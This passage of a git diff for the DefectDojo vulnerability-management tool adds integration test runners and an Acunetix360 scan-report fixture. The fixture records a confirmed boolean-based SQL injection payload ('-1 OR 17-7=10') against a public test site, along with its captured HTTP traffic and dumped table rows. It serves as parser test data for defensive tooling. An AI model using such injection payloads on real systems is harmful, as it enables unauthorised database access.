driver.find_element(By.NAME, '_Import Scan Results').click() + try: + driver.find_element(By.ID, 'id_active').get_attribute('checked') + driver.find_element(By.ID, 'id_verified').get_attribute('checked') + scan_type = scan_map[test] + Select(driver.find_element(By.ID, "id_scan_type")).select_by_visible_text(scan_type) + test_location = self.repo_path + '/' + test + '/' + case + driver.find_element(By.ID, 'id_file').send_keys(test_location) + driver.find_element(By.CSS_SELECTOR, "input.btn.btn-primary").click() + EngagementTXT = ''.join(driver.find_element(By.TAG_NAME, "BODY").text).split('\n') + reg = re.compile('processed, a total of') + matches = list(filter(reg.search, EngagementTXT)) + if len(matches) != 1: + failed_tests += [test.upper() + ' - ' + case + ': Not imported'] + except Exception as e: + if e == 'Message: timeout': + failed_tests += [test.upper() + ' - ' + case + ': Not imported due to timeout'] + else: + failed_tests += [test.upper() + ': Cannot auto select scan type'] + break + + if len(failed_tests) > 0: + print('The following scan imports produced errors') + print('Names of tests must match those listed in /dojo/tools') + print('Tests can be added/modified here:') + print('https://github.com/DefectDojo/sample-scan-files\n') + for test in failed_tests: + print(test) + print() + assert len(failed_tests) == 0 + + def tearDown(self): + super().tearDown(self) + shutil.rmtree(self.repo_path) + + +def suite(): + suite = unittest.TestSuite() + suite.addTest(BaseTestCase('test_login')) + suite.addTest(BaseTestCase('disable_block_execution')) + suite.addTest(ScannerTest('test_check_test_file')) + suite.addTest(ScannerTest('test_check_for_doc')) + suite.addTest(ScannerTest('test_check_for_forms')) + suite.addTest(ScannerTest('test_check_for_options')) + suite.addTest(ProductTest('test_create_product')) + suite.addTest(ScannerTest('test_engagement_import_scan_result')) + suite.addTest(ProductTest('test_delete_product')) + return suite + + +if __name__ == "__main__": + runner = unittest.TextTestRunner(descriptions=True, failfast=True, verbosity=2) + ret = not runner.run(suite()).wasSuccessful() + BaseTestCase.tearDownDriver() + sys.exit(ret) diff --git a/tests/local-integration-tests.bat b/tests/local-integration-tests.bat new file mode 100644 index 00000000000..17ce68eaafa --- /dev/null +++ b/tests/local-integration-tests.bat @@ -0,0 +1,76 @@ +set DD_ADMIN_USER=admin +set DD_ADMIN_PASSWORD=admin +set DD_BASE_URL=http://localhost:8080/ + +echo "Running Product type integration tests" +python tests/product_type_test.py +if %ERRORLEVEL% NEQ 0 GOTO END + +echo "Running Product integration tests" +python tests/product_test.py +if %ERRORLEVEL% NEQ 0 GOTO END + +echo "Running Endpoint integration tests" +python tests/endpoint_test.py +if %ERRORLEVEL% NEQ 0 GOTO END + +echo "Running Engagement integration tests" +python tests/engagement_test.py +if %ERRORLEVEL% NEQ 0 GOTO END + +echo "Running Environment integration tests" +python tests/environment_test.py +if %ERRORLEVEL% NEQ 0 GOTO END + +echo "Running Finding integration tests" +python tests/finding_test.py +if %ERRORLEVEL% NEQ 0 GOTO END + +echo "Running Test integration tests" +python tests/test_test.py +if %ERRORLEVEL% NEQ 0 GOTO END + +echo "Running User integration tests" +python tests/user_test.py +if %ERRORLEVEL% NEQ 0 GOTO END + +echo "Running Ibm Appscan integration test" +python tests/ibm_appscan_test.py +if %ERRORLEVEL% NEQ 0 GOTO END + +echo "Running Search integration test" +python tests/search_test.py +if %ERRORLEVEL% NEQ 0 GOTO END + +echo "Running Dedupe integration tests" +python tests/dedupe_test.py +if %ERRORLEVEL% NEQ 0 GOTO END + +echo "Running Report Builder integration tests" +python tests/report_builder_test.py +if %ERRORLEVEL% NEQ 0 GOTO END + +echo "Running Check Various Pages integration test" +python tests/check_various_pages.py +if %ERRORLEVEL% NEQ 0 GOTO END + +REM REM The below tests are commented out because they are still an unstable work in progress +REM REM Once Ready they can be uncommented. + +REM REM echo "Running Import Scanner integration test" +rem rem python tests/import_scanner_test.py +REM REM echo "Success: Import Scanner integration tests passed" +REM REM else +REM REM echo "Error: Import Scanner integration test failed"; exit 1 +REM REM fi + +REM REM echo "Running Zap integration test" +REM REM python tests/zap.py +REM REM echo "Success: zap integration tests passed" +REM REM else +REM REM echo "Error: Zap integration test failed"; exit 1 +REM REM fi + +REM echo "Done Running all configured integration tests." + +:END diff --git a/tests/local-integration-tests.sh b/tests/local-integration-tests.sh new file mode 100755 index 00000000000..5c63aad625b --- /dev/null +++ b/tests/local-integration-tests.sh @@ -0,0 +1,148 @@ +#!/bin/bash + +export DD_BASE_URL='http://localhost:8080/' + + +# All available Unittest Scripts are activated below +# If successful, A success message is printed and the script continues +# If any script is unsuccessful a failure message is printed and the test script +# Exits with status code of 1 + +echo "Running Product type integration tests" +if python3 tests/regulations_test.py ; then + echo "Success: Regulation integration tests passed" +else + docker-compose logs uwsgi --tail=120 + echo "Error: Regulation integration test failed."; exit 1 +fi + +echo "Running Product type integration tests" +if python3 tests/product_type_test.py ; then + echo "Success: Product type integration tests passed" +else + docker-compose logs uwsgi --tail=120 + echo "Error: Product type integration test failed."; exit 1 +fi + +echo "Running Product integration tests" +if python3 tests/product_test.py ; then + echo "Success: Product integration tests passed" +else + docker-compose logs uwsgi --tail=120 + echo "Error: Product integration test failed"; exit 1 +fi + +echo "Running Dedupe integration tests" +if python3 tests/dedupe_test.py ; then + echo "Success: Dedupe integration tests passed" +else + docker-compose logs uwsgi --tail=120 + echo "Error: Dedupe integration test failed"; exit 1 +fi + +echo "Running Endpoint integration tests" +if python3 tests/endpoint_test.py ; then + echo "Success: Endpoint integration tests passed" +else + docker-compose logs uwsgi --tail=120 + echo "Error: Endpoint integration test failed"; exit 1 +fi + +echo "Running Engagement integration tests" +if python3 tests/engagement_test.py ; then + echo "Success: Engagement integration tests passed" +else + docker-compose logs uwsgi --tail=120 + echo "Error: Engagement integration test failed"; exit 1 +fi + +echo "Running Environment integration tests" +if python3 tests/environment_test.py ; then + echo "Success: Environment integration tests passed" +else + docker-compose logs uwsgi --tail=120 + echo "Error: Environment integration test failed"; exit 1 +fi + +echo "Running Finding integration tests" +if python3 tests/finding_test.py ; then + echo "Success: Finding integration tests passed" +else + docker-compose logs uwsgi --tail=120 + echo "Error: Finding integration test failed"; exit 1 +fi + +echo "Running Test integration tests" +if python3 tests/test_test.py ; then + echo "Success: Test integration tests passed" +else + docker-compose logs uwsgi --tail=120 + echo "Error: Test integration test failed"; exit 1 +fi + +echo "Running User integration tests" +if python3 tests/user_test.py ; then + echo "Success: User integration tests passed" +else + docker-compose logs uwsgi --tail=120 + echo "Error: User integration test failed"; exit 1 +fi + +echo "Running Ibm Appscan integration test" +if python3 tests/ibm_appscan_test.py ; then + echo "Success: Ibm AppScan integration tests passed" +else + docker-compose logs uwsgi --tail=120 + echo "Error: Ibm AppScan integration test failed"; exit 1 +fi + +echo "Running Report Builder integration tests" +if python3 tests/report_builder_test.py ; then + echo "Success: Report Builder integration tests passed" +else + docker-compose logs uwsgi --tail=120 + echo "Error: Report Builder integration test failed."; exit 1 +fi + +echo "Running Search integration test" +if python3 tests/search_test.py ; then + echo "Success: Search integration tests passed" +else + docker-compose logs uwsgi --tail=120 + echo "Error: Search integration test failed"; exit 1 +fi + +test="Check Various Pages integration test" +echo "Running: $test" +if python3 tests/check_various_pages.py ; then + success $test +else + fail $test +fi + +test="Test notifications" +echo "Running: $test" +if python3 tests/notifications_test.py ; then + success $test +else + fail $test +fi + +# The below tests are commented out because they are still an unstable work in progress +## Once Ready they can be uncommented. + +# echo "Running Import Scanner integration test" +# if python3 tests/import_scanner_test.py ; then +# echo "Success: Import Scanner integration tests passed" +# else +# echo "Error: Import Scanner integration test failed"; exit 1 +# fi + +# echo "Running Zap integration test" +# if python3 tests/zap.py ; then +# echo "Success: zap integration tests passed" +# else +# echo "Error: Zap integration test failed"; exit 1 +# fi + +exec echo "Done Running all configured integration tests." diff --git a/unittests/scans/acunetix360/acunetix360_many_findings.json b/unittests/scans/acunetix360/acunetix360_many_findings.json new file mode 100644 index 00000000000..6326aa3fce1 --- /dev/null +++ b/unittests/scans/acunetix360/acunetix360_many_findings.json @@ -0,0 +1,4681 @@ +{ + "Generated": "25/06/2021 10:00 AM", + "Target": { + "Duration": "00:12:24.8161163", + "Initiated": "25/06/2021 01:46 AM", + "ScanId": "ee9136920f6243486d12ad5104e2f745", + "Url": "http://php.testsparker.com/" + }, + "Vulnerabilities": [ + { + "Certainty": 100, + "Classification": { + "Iso27001": "A.14.2.5", + "Capec": "107", + "Cvss": { + "BaseScore": { + "Severity": 2, + "Type": "Base", + "Value": "5.7" + }, + "EnvironmentalScore": { + "Severity": 2, + "Type": "Environmental", + "Value": "5.5" + }, + "TemporalScore": { + "Severity": 2, + "Type": "Temporal", + "Value": "5.5" + }, + "Vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N/E:H/RL:O/RC:C" + }, + "Cvss31": null, + "Cwe": "16", + "Hipaa": "", + "Owasp": "A5", + "OwaspProactiveControls": "", + "Pci32": "", + "Wasc": "15" + }, + "Confirmed": true, + "Description": "

    Acunetix360 identified a cookie not marked as HTTPOnly.

    \n

    HTTPOnly cookies cannot be read by client-side scripts, therefore marking a cookie as HTTPOnly can provide an additional layer of protection against cross-site scripting attacks.

    ", + "ExploitationSkills": "", + "ExternalReferences": "", + "ExtraInformation": [ + { + "Name": "Identified Cookie(s)", + "Value": "PHPSESSID" + }, + { + "Name": "Cookie Source", + "Value": "HTTP Header" + }, + { + "Name": "Page Type", + "Value": "Login" + } + ], + "FirstSeenDate": "16/06/2021 12:30 PM", + "HttpRequest": { + "Content": "GET /auth/login.php HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nReferer: http://php.testsparker.com/auth/\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Acunetix360\r\n\r\n", + "Method": "GET", + "Parameters": [] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nSet-Cookie: PHPSESSID=e52a07f0fe53c0294ae211bc4481332d; path=/\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nContent-Length: 3061\r\nX-Powered-By: PHP/5.2.6\r\nPragma: no-cache\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nKeep-Alive: timeout=5, max=150\r\nConnection: Keep-Alive\r\nContent-Type: text/html\r\nDate: Thu, 24 Jun 2021 22:49:36 GMT\r\nCache-Control: no-store, must-revalidate, no-cache, post-check=0, pre-check=0\r\n\r\n\n\n\n\n\n\n\nAcunetix Test Web Site - PHP\n\n\n
    \n \n\t
    \n\t\t\n\t
    \n\t\n\t
    \n\n\t
    \n\t\t
    \n\t
    \n\t
    \n\t\t
    \n\t\t\t
    \n\t\t\t\t\t\t\t\t

    Login Area

    \n\t\t\t\t\t

    \n Enter your credentials (admin / admin123456)\n
    \n

    \n Username: \n
    \n Password:  \n\n\n
    \n\t \n
    \n \n
    \n

    \n\n\t\t\t\t
     
    \n\t\t\t\t
    \n\n\n\t\t\t\t
    \n\t\t\t
    \n\t\t
     
    \n\t\t
    \n\t\t\n\t \n\t
    \n\t\t\t
      \n\t\t\t\t
    • \n\t\t\t\t\t
      \n\t\t\t\t\t\t
      \n\t\t\t\t\t\t\t
      \n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t
      \n\t\t\t\t\t\t
      \n\t\t\t\t\n\t\t\t\t\t
      \n\t\t\t\t\t
       
      \n\t\t\t\t
    • \n\t\t\t\t
    • \n\t\t\t\t\t

      Tags

      \n\t\t\t\t\t

      Acunetix xss web-application-security false-positive-free automated-exploitation sql-injection local/remote-file-inclusion

      \n\t\t\t\t
    • \n\t\t\t\t
    • \n\t\t\t\t\t

      Inner Pages

      \n\t\t\t\t\t\n\t\t\t\t
    • \n\t\t\t\t
    • \n\t\t\t\t\t

      Links

      \n\t\t\t\t\t\n\t\t\t\t
    • \n\t\t\t\t
    • \n\n\t\t\t
    \n\t\t
    \t\t\n\t\t
     
    \n\t
    \n\t
    \n\t
    \n\t\n
    \nv\n
    \n\t\t

    Copyright (c) 2010 testsparker.com. All rights reserved. Design by Free CSS Templates.

    \n\t
    \t\n\n\n", + "Duration": 41.4849, + "StatusCode": 200 + }, + "LookupId": "735f4503-e9eb-4b4c-4306-ad49020a4c4b", + "Impact": "
    During a cross-site scripting attack, an attacker might easily access cookies and hijack the victim's session.
    ", + "KnownVulnerabilities": [], + "LastSeenDate": "25/06/2021 01:52 AM", + "Name": "Cookie Not Marked as HttpOnly", + "ProofOfConcept": "", + "RemedialActions": "
    \n
      \n
    1. See the remedy for solution.
    2. \n
    3. Consider marking all of the cookies used by the application as HTTPOnly. (After these changes javascript code will not be able to read cookies.)
    4. \n
    \n
    ", + "RemedialProcedure": "
    Mark the cookie as HTTPOnly. This will be an extra layer of defense against XSS. However this is not a silver bullet and will not protect the system against cross-site scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.
    ", + "RemedyReferences": "", + "Severity": "Medium", + "State": "Present", + "Type": "CookieNotMarkedAsHttpOnly", + "Url": "http://php.testsparker.com/auth/login.php" + }, + { + "Certainty": 100, + "Classification": { + "Iso27001": "A.14.2.5", + "Capec": "66", + "Cvss": { + "BaseScore": { + "Severity": 4, + "Type": "Base", + "Value": "10.0" + }, + "EnvironmentalScore": { + "Severity": 4, + "Type": "Environmental", + "Value": "10.0" + }, + "TemporalScore": { + "Severity": 4, + "Type": "Temporal", + "Value": "10.0" + }, + "Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" + }, + "Cvss31": { + "BaseScore": { + "Severity": 4, + "Type": "Base", + "Value": "10.0" + }, + "EnvironmentalScore": { + "Severity": 4, + "Type": "Environmental", + "Value": "10.0" + }, + "TemporalScore": { + "Severity": 4, + "Type": "Temporal", + "Value": "10.0" + }, + "Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" + }, + "Cwe": "89", + "Hipaa": "164.306(a), 164.308(a)", + "Owasp": "A1", + "OwaspProactiveControls": "", + "Pci32": "6.5.1", + "Wasc": "19" + }, + "Confirmed": true, + "Description": "

    Acunetix360 identified a Boolean-Based SQL Injection, which occurs when data input by a user is interpreted as a SQL command rather than as normal data by the backend database.

    \n

    This is an extremely common vulnerability and its successful exploitation can have critical implications.

    \n

    Acunetix360 confirmed the vulnerability by executing a test SQL query on the backend database. In these tests, SQL injection was not obvious, but the different responses from the page based on the injection test allowed Acunetix360 to identify and confirm the SQL injection.

    Proof of Exploit

    Identified Database Name

    sqlibench

    Identified Database User

    root@localhost

    Identified Database Version

    5.0.51b-community-nt-log
    ", + "ExploitationSkills": "
    There are numerous freely available tools to exploit SQL injection vulnerabilities. This is a complex area with many dependencies; however, it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them.
    ", + "ExternalReferences": "", + "ExtraInformation": [], + "FirstSeenDate": "16/06/2021 12:38 PM", + "HttpRequest": { + "Content": "GET /artist.php?id=-1%20OR%2017-7%3d10 HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nCookie: PHPSESSID=e52a07f0fe53c0294ae211bc4481332d\r\nReferer: http://php.testsparker.com/process.php?file=Generics/index.nsp\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Acunetix360\r\n\r\n", + "Method": "GET", + "Parameters": [ + { + "Name": "id", + "Type": "Querystring", + "Value": "-1 OR 17-7=10", + "Vulnerable": true + } + ] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nX-Powered-By: PHP/5.2.6\r\nConnection: Keep-Alive\r\nKeep-Alive: timeout=5, max=150\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nDate: Thu, 24 Jun 2021 22:51:27 GMT\r\n\r\n\n\n\n\n\n\n\nAcunetix Test Web Site - PHP\n\n\n\n
    \n \n\t
    \n\t\t\n\t
    \n\t\n\t
    \n\n\t
    \n\t\t
    \n\t
    \n\t
    \n\t\t
    \n\t\t\t
    \n\t\t\t\t

    Artist Service

    \n\n\t\t\t\t
     
    \n\t\t\t\t
    \n\t\t\t\t\t

    \n \n

    Results: -1 OR 17-7=10


    \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
    IDNameSURNAMECREATION DATE
    2 NICK WAHLBERG 2006-02-15 04:34:33
    3 ED CHASE 2006-02-15 04:34:33
    4 JENNIFER DAVIS 2006-02-15 04:34:33
    5 JOHNNY LOLLOBRIGIDA 2006-02-15 04:34:33
    6 BETTE NICHOLSON 2006-02-15 04:34:33
    7 GRACE MOSTEL 2006-02-15 04:34:33
    8 MATTHEW JOHANSSON 2006-02-15 04:34:33
    9 JOE SWANK 2006-02-15 04:34:33
    10 CHRISTIAN GABLE 2006-02-15 04:34:33
    11 ZERO CAGE 2006-02-15 04:34:33
    12 KARL BERRY 2006-02-15 04:34:33
    13 UMA WOOD 2006-02-15 04:34:33
    14 VIVIEN BERGEN 2006-02-15 04:34:33
    15 CUBA OLIVIER 2006-02-15 04:34:33
    16 FRED COSTNER 2012-03-13 12:14:54 22
    17 HELEN VOIGHT 2012-03-13 12:14:54 22
    18 DAN TORN 2012-03-13 12:14:54 22
    19 BOB FAWCETT 2012-03-13 12:14:54 22
    20 LUCILLE TRACY 2012-03-13 12:14:54 22
    21 KIRSTEN PALTROW 2012-03-13 12:14:54 22
    22 ELVIS MARX 2012-03-13 12:14:54 22
    23 SANDRA KILMER 2012-03-13 12:14:54 22
    24 CAMERON STREEP 2012-03-13 12:14:54 22
    25 KEVIN BLOOM 2012-03-13 12:14:54 22
    26 RIP CRAWFORD 2012-03-13 12:14:54 22
    27 JULIA MCQUEEN 2012-03-13 12:14:54 22
    28 WOODY HOFFMAN 2012-03-13 12:14:54 22
    29 ALEC WAYNE 2012-03-13 12:14:54 22
    30 SANDRA PECK 2012-03-13 12:14:54 22
    31 SISSY SOBIESKI 2012-03-13 12:14:54 22
    32 TIM HACKMAN 2012-03-13 12:14:54 22
    33 MILLA PECK 2012-03-13 12:14:54 22
    34 AUDREY OLIVIER 2012-03-13 12:14:54 22
    35 JUDY DEAN 2012-03-13 12:14:54 22
    36 BURT DUKAKIS 2012-03-13 12:14:54 22
    37 VAL BOLGER 2012-03-13 12:14:54 22
    38 TOM MCKELLEN 2012-03-13 12:14:54 22
    39 GOLDIE BRODY 2012-03-13 12:14:54 22
    40 JOHNNY CAGE 2012-03-13 12:14:54 22
    41 JODIE DEGENERES 2012-03-13 12:14:54 22
    42 TOM MIRANDA 2012-03-13 12:14:54 22
    43 KIRK JOVOVICH 2012-03-13 12:14:54 22
    44 NICK STALLONE 2012-03-13 12:14:54 22
    45 REESE KILMER 2012-03-13 12:14:54 22
    46 PARKER GOLDBERG 2012-03-13 12:14:54 22
    47 JULIA BARRYMORE 2012-03-13 12:14:54 22
    48 FRANCES DAY-LEWIS 2012-03-13 12:14:54 22
    49 ANNE CRONYN 2012-03-13 12:14:54 22
    50 NATALIE HOPKINS 2012-03-13 12:14:54 22
    51 GARY PHOENIX 2012-03-13 12:14:54 22
    52 CARMEN HUNT 2012-03-13 12:14:54 22
    53 MENA TEMPLE 2012-03-13 12:14:54 22
    54 PENELOPE PINKETT 2012-03-13 12:14:54 22
    55 FAY KILMER 2012-03-13 12:14:54 22
    56 DAN HARRIS 2012-03-13 12:14:54 22
    57 JUDE CRUISE 2012-03-13 12:14:54 22
    58 CHRISTIAN AKROYD 2012-03-13 12:14:54 22
    59 DUSTIN TAUTOU 2012-03-13 12:14:54 22
    60 HENRY BERRY 2012-03-13 12:14:54 22
    61 CHRISTIAN NEESON 2012-03-13 12:14:54 22
    62 JAYNE NEESON 2012-03-13 12:14:54 22
    63 CAMERON WRAY 2012-03-13 12:14:54 22
    64 RAY JOHANSSON 2012-03-13 12:14:54 22
    65 ANGELA HUDSON 2012-03-13 12:14:54 22
    66 MARY TANDY 2012-03-13 12:14:54 22
    67 JESSICA BAILEY 2012-03-13 12:14:54 22
    68 RIP WINSLET 2012-03-13 12:14:54 22
    69 KENNETH PALTROW 2012-03-13 12:14:54 22
    70 MICHELLE MCCONAUGHEY 2012-03-13 12:14:54 22
    71 ADAM GRANT 2012-03-13 12:14:54 22
    72 SEAN WILLIAMS 2012-03-13 12:14:54 22
    73 GARY PENN 2012-03-13 12:14:54 22
    74 MILLA KEITEL 2012-03-13 12:14:54 22
    75 BURT POSEY 2012-03-13 12:14:54 22
    76 ANGELINA ASTAIRE 2012-03-13 12:14:54 22
    77 CARY MCCONAUGHEY 2012-03-13 12:14:54 22
    78 GROUCHO SINATRA 2012-03-13 12:14:54 22
    79 MAE HOFFMAN 2012-03-13 12:14:54 22
    80 RALPH CRUZ 2012-03-13 12:14:54 22
    81 SCARLETT DAMON 2012-03-13 12:14:54 22
    82 WOODY JOLIE 2012-03-13 12:14:54 22
    83 BEN WILLIS 2012-03-13 12:14:54 22
    84 JAMES PITT 2012-03-13 12:14:54 22
    85 MINNIE ZELLWEGER 2012-03-13 12:14:54 22
    86 GREG CHAPLIN 2012-03-13 12:14:54 22
    87 SPENCER PECK 2012-03-13 12:14:54 22
    88 KENNETH PESCI 2012-03-13 12:14:54 22
    89 CHARLIZE DENCH 2012-03-13 12:14:54 22
    90 SEAN GUINESS 2012-03-13 12:14:54 22
    91 CHRISTOPHER BERRY 2012-03-13 12:14:54 22
    92 KIRSTEN AKROYD 2012-03-13 12:14:54 22
    93 ELLEN PRESLEY 2012-03-13 12:14:54 22
    94 KENNETH TORN 2012-03-13 12:14:54 22
    95 DARYL WAHLBERG 2012-03-13 12:14:54 22
    96 GENE WILLIS 2012-03-13 12:14:54 22
    97 MEG HAWKE 2012-03-13 12:14:54 22
    98 CHRIS BRIDGES 2012-03-13 12:14:54 22
    99 JIM MOSTEL 2012-03-13 12:14:54 22
    100 SPENCER DEPP 2012-03-13 12:14:54 22
    101 SUSAN DAVIS 2012-03-13 12:14:54 22
    102 WALTER TORN 2012-03-13 12:14:54 22
    103 MATTHEW LEIGH 2012-03-13 12:14:54 22
    104 PENELOPE CRONYN 2012-03-13 12:14:54 22
    105 SIDNEY CROWE 2012-03-13 12:14:54 22
    106 GROUCHO DUNST 2012-03-13 12:14:54 22
    107 GINA DEGENERES 2012-03-13 12:14:54 22
    108 WARREN NOLTE 2012-03-13 12:14:54 22
    109 SYLVESTER DERN 2012-03-13 12:14:54 22
    110 SUSAN DAVIS 2012-03-13 12:14:54 22
    111 CAMERON ZELLWEGER 2012-03-13 12:14:54 22
    112 RUSSELL BACALL 2012-03-13 12:14:54 22
    113 MORGAN HOPKINS 2012-03-13 12:14:54 22
    114 MORGAN MCDORMAND 2012-03-13 12:14:54 22
    115 HARRISON BALE 2012-03-13 12:14:54 22
    116 DAN STREEP 2012-03-13 12:14:54 22
    117 RENEE TRACY 2012-03-13 12:14:54 22
    118 CUBA ALLEN 2012-03-13 12:14:54 22
    119 WARREN JACKMAN 2012-03-13 12:14:54 22
    120 PENELOPE MONROE 2012-03-13 12:14:54 22
    121 LIZA BERGMAN 2012-03-13 12:14:54 22
    122 SALMA NOLTE 2012-03-13 12:14:54 22
    123 JULIANNE DENCH 2012-03-13 12:14:54 22
    124 SCARLETT BENING 2012-03-13 12:14:54 22
    125 ALBERT NOLTE 2012-03-13 12:14:54 22
    126 FRANCES TOMEI 2012-03-13 12:14:54 22
    127 KEVIN GARLAND 2012-03-13 12:14:54 22
    128 CATE MCQUEEN 2012-03-13 12:14:54 22
    129 DARYL CRAWFORD 2012-03-13 12:14:54 22
    130 GRETA KEITEL 2012-03-13 12:14:54 22
